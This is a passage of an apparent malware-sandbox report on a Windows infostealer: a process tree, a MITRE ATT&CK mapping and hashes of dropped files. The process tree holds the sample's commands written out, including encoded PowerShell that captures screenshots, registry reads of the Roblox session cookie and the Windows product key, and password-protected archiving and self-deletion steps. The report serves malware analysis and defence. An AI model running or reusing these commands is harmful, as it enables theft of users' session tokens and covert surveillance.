MAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4360
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zurj41tt\zurj41tt.cmdline"
        5⤵
        
        PID:4736
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD57.tmp" "c:\Users\Admin\AppData\Local\Temp\zurj41tt\CSCF96CA5723B304A5DAEAABF21F7306F.TMP"
        6⤵
        
        PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4716
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1432
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1344
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1064
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2176
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:832
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4204
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4612
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4060
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:400
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28682\rar.exe a -r -hp"fares" "C:\Users\Admin\AppData\Local\Temp\l7WM6.zip" *"
    3⤵
    PID:3884
  - - C:\Users\Admin\AppData\Local\Temp\_MEI28682\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI28682\rar.exe a -r -hp"fares" "C:\Users\Admin\AppData\Local\Temp\l7WM6.zip" *
      4⤵
      Executes dropped EXE
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3984
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:560
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Builder.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2324
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1976

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe ca7140f00e1796e000e4a959125d5dd6 vLeUx66gQUaPiFn+pEc+yw.0.1.0.0.0
1⤵
PID:1672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0f59cccd39a3694e0e6dfd44d0fa76d

SHA1
fccd7911d463041e1168431df8823e4c4ea387c1

SHA256
70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

SHA512
5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
27381f8b5c7b584107d9218a4c57c6b8

SHA1
078ea1ce77069c542fc1bf20ccaeac0022ed000c

SHA256
09c4a2d47aba43ee721e0a5ae0f851b5e9b1829e9600e3cda35f6a710d13650c

SHA512
e15707f1814720ae22db55b1e706eed8b7f46de579c3e9abd53dd3c141ef89984073b88c2f89473e3049effa6024cada6664881eb922774c11baeca26142857a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4f5673a67a37d90d934c9183981457cf

SHA1
688f4caea166e59365cfae3a2f0b7ee79e9bbee5

SHA256
fcfa181b295d5598ecaafda45d59a94124e1078d3681df8317d453eaf86f4f85

SHA512
a1d49a2f1fa0adc3346516f30db0d143fb137d5b362b0fb924c4abbec7b973e0733950ae20029b049966eeafc10b33856fd534d73f66ae5a19f31451b9a23421

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9f9d8cd5eed83c1152fcb5e413b54bc5

SHA1
d9dc704b191c25f72cef65b205148ebba989f779

SHA256
a1834511c3a6a43fedd83ca092ab18cb83029d2ff930bf8f3b8a21b7b72b70a2

SHA512
ace9d0ea0681780ab39e694e2652e410c60499c3b82e08012b9bf285fa0e4beb39903aff1e84bb14b2ed2f5cbcec7dd269eff6ce089dbb2b84d53145e81eeea4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAD57.tmp

Filesize
1KB

MD5
0d49ec41634968e65218bb3137ded01f

SHA1
ff8cdb7cdd79109fac50d23bb3fc3053121a577d

SHA256
8a7da5e888a2ecdb05fc1926c443ad51e5b9cb6f07374f51b870c6829890fdd7

SHA512
825e7b5f1906e6bfb2faf64752839533bfb1eacbff72500801e3e25b0894ab0c742a9223af20a49d6947bf1134318afb361c1bca5380b4f41fff62ffb43025d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_bz2.pyd

Filesize
46KB

MD5
93fe6d3a67b46370565db12a9969d776

SHA1
ff520df8c24ed8aa6567dd0141ef65c4ea00903b

SHA256
92ec61ca9ac5742e0848a6bbb9b6b4cda8e039e12ab0f17fb9342d082dde471b

SHA512
5c91b56198a8295086c61b4f4e9f16900a7ec43ca4b84e793bc8a3fc8676048cab576e936515bf2971318c7847f1314674b3336fe83b1734f9f70d09615519ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_ctypes.pyd

Filesize
56KB

MD5
813fc3981cae89a4f93bf7336d3dc5ef

SHA1
daff28bcd155a84e55d2603be07ca57e3934a0de

SHA256
4ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06

SHA512
ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_decimal.pyd

Filesize
103KB

MD5
f65d2fed5417feb5fa8c48f106e6caf7

SHA1
9260b1535bb811183c9789c23ddd684a9425ffaa

SHA256
574fe8e01054a5ba07950e41f37e9cf0aea753f20fe1a31f58e19202d1f641d8

SHA512
030502fa4895e0d82c8cce00e78831fc3b2e6d956c8cc3b9fb5e50cb23ef07cd6942949a9f16d02da6908523d9d4ef5f722fb1336d4a80cd944c9f0cb11239ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_hashlib.pyd

Filesize
33KB

MD5
4ae75c47dbdebaa16a596f31b27abd9e

SHA1
a11f963139c715921dedd24bc957ab6d14788c34

SHA256
2308ee238cc849b1110018b211b149d607bf447f4e4c1e61449049eab0cf513d

SHA512
e908fecb52268fac71933e2fdb96e539bdebe4675dfb50065aee26727bac53e07cca862193bcb3ab72d2ae62d660113a47e73e1e16db401480e4d3fd34d54fa8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_lzma.pyd

Filesize
84KB

MD5
6f810f46f308f7c6ccddca45d8f50039

SHA1
6ee24ff6d1c95ba67e1275bb82b9d539a7f56cea

SHA256
39497259b87038e86c53e7a39a0b5bbbfcebe00b2f045a148041300b31f33b76

SHA512
c692367a26415016e05ebe828309d3ffec290c6d2fd8cc7419d529a51b0beda00ccdc327c9f187ae3ca0cc96336d23d84a8ff95b729c8958b14fb91b6da9e878

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_queue.pyd

Filesize
24KB

MD5
0e7612fc1a1fad5a829d4e25cfa87c4f

SHA1
3db2d6274ce3dbe3dbb00d799963df8c3046a1d6

SHA256
9f6965eb89bbf60df0c51ef0750bbd0655675110d6c42eca0274d109bd9f18a8

SHA512
52c57996385b9a573e3105efa09fd6fd24561589b032ef2b2ee60a717f4b33713c35989f2265669f980646d673e3c387b30b9fc98033bb8ca7c59ece1c17e517

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_socket.pyd

Filesize
41KB

MD5
7a31bc84c0385590e5a01c4cbe3865c3

SHA1
77c4121abe6e134660575d9015308e4b76c69d7c

SHA256
5614017765322b81cc57d841b3a63cbdc88678ff605e5d4c8fdbbf8f0ac00f36

SHA512
b80cd51e395a3ce6f345b69243d8fc6c46e2e3828bd0a7e63673a508d889a9905d562cac29f1ed394ccfcda72f2f2e22f675963dd96261c19683b06dea0a0882

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_sqlite3.pyd

Filesize
48KB

MD5
bb4aa2d11444900c549e201eb1a4cdd6

SHA1
ca3bb6fc64d66deaddd804038ea98002d254c50e

SHA256
f44d80ab16c27ca65da23ae5fda17eb842065f3e956f10126322b2ea3ecdf43f

SHA512
cd3c5704e5d99980109fdc505d39ad5b26a951685e9d8e3fed9e0848cd44e24cc4611669dbdb58acc20f1f4a5c37d5e01d9d965cf6fe74f94da1b29aa2ff6931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_ssl.pyd

Filesize
60KB

MD5
081c878324505d643a70efcc5a80a371

SHA1
8bef8336476d8b7c5c9ef71d7b7db4100de32348

SHA256
fcb70b58f94f5b0f9d027999cce25e99ddcc8124e4ddcc521cb5b96a52faaa66

SHA512
c36293b968a2f83705815ef3a207e444eeb7667ad9af61df75e85151f74f2fe0a299b3b1349de0d410bbbaea9f99cac5228189099a221de5fa1e20c97c648e32

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\base_library.zip

Filesize
859KB

MD5
699b649fafc1acc8a7634e266bbf0ace

SHA1
af1f52e4a25cbedf30a2c521f7cb77583410553f

SHA256
3f60dee1b7f4a83845762f971095addac36dea72ba52086b30674be816b6dd82

SHA512
72bb0f6df7b43d3c355577f6d3eb8ffa44c992c500476b335e59573ad120c1c2fac86e81795e6100a5f58f40f9ea6fffb90ebb286ae409ef0ed61b934c6a179a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\blank.aes

Filesize
76KB

MD5
2f612ac74270fba1d1d1d8b263c03cc9

SHA1
b2c89ad78fcb1319f0c84a5aa497544ca65cfbf6

SHA256
703fbb39518a82222ecce30da57c33aa1b2dea56e0af2aa9152d5e6b3706d4e8

SHA512
2d38c9fcffd55171dff284d3f059f7dc0e3fb03e625f1fe7d34e72e95aa00e5e91e73399e75ebb3c03c6199af6c7fc005bc5c5f3fd38ad84f1e647a22fe14bf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\libcrypto-1_1.dll

Filesize
1.1MB

MD5
daa2eed9dceafaef826557ff8a754204

SHA1
27d668af7015843104aa5c20ec6bbd30f673e901

SHA256
4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914

SHA512
7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\libffi-7.dll

Filesize
23KB

MD5
6f818913fafe8e4df7fedc46131f201f

SHA1
bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

SHA256
3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

SHA512
5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\libssl-1_1.dll

Filesize
203KB

MD5
eac369b3fde5c6e8955bd0b8e31d0830

SHA1
4bf77158c18fe3a290e44abd2ac1834675de66b4

SHA256
60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c

SHA512
c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\python310.dll

Filesize
1.4MB

MD5
178a0f45fde7db40c238f1340a0c0ec0

